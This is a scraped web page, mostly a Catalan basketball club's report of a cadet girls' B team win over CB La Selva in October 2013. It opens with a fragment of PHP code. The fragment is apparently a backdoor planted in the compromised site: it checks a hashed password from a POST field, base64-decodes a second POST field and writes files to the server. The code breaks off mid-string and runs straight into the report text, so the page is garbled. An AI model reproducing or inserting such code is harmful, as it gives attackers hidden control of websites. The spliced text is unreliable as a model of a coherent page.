function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria molt treballada del cadet femení B - Tgn Bàsquet Club -

Victòria molt treballada del cadet femení B

Updated: octubre 21, 2013

Partit resolt amb solvència per part del Cadet B en la visita del CB La Selva. Tot i això, queda molt de treball per tal de que totes les jugadores acabin de trobar el seu rol dins l’equip, per tal de fer que l’equip estigui més conjuntat. El partit va començar amb anades i vingudes en el marcador, fins que les nostres van agafar la iniciativa del partit gràcies a 8 punts seguits de Guirao, per acabar el primer període guanyant de 4. (15-11) Durant el segon quart vam aconseguir endurir la defensa, cosa que va provocar que les noies de La Selva nomes fessin 6 punts. D’aquesta manera s’arribava a la mitja part amb un resultat que ens donava tranquil·litat (26-17). Tot i això, durant aquests 20 primers minuts es van fallar 12 tirs lliures.

Aquesta tranquil·litat es va convertir en relaxació a la tornada del descans, ja que vam perdre el control del partit i seguíem fallant tirs lliures, això va fer que La Selva recuperés 2 punts i la il·lusió per guanyar el partit. Així doncs, en l’últim període entre Barreira (6 dels 7 punts) i Ruiz (7 dels 16), tornaven a recuperar el ritme del partit, llegint perfectament el que l’equip necessitava i finalitzant amb encert. Tot i això, durant els últims minuts es va donar el partit per guanyat (55-40) i es van abaixar els braços, fent que La Selva fes un parcial en 2 minuts de 4-8, demostrant que necessitem mantenir el ritme durant tot el partit.

El nostre Cadet B, aconsegueix d’aquesta manera el seu quart triomf. La setmana que ve tancarem la primera volta visitant el CB Alcanar a les 19h.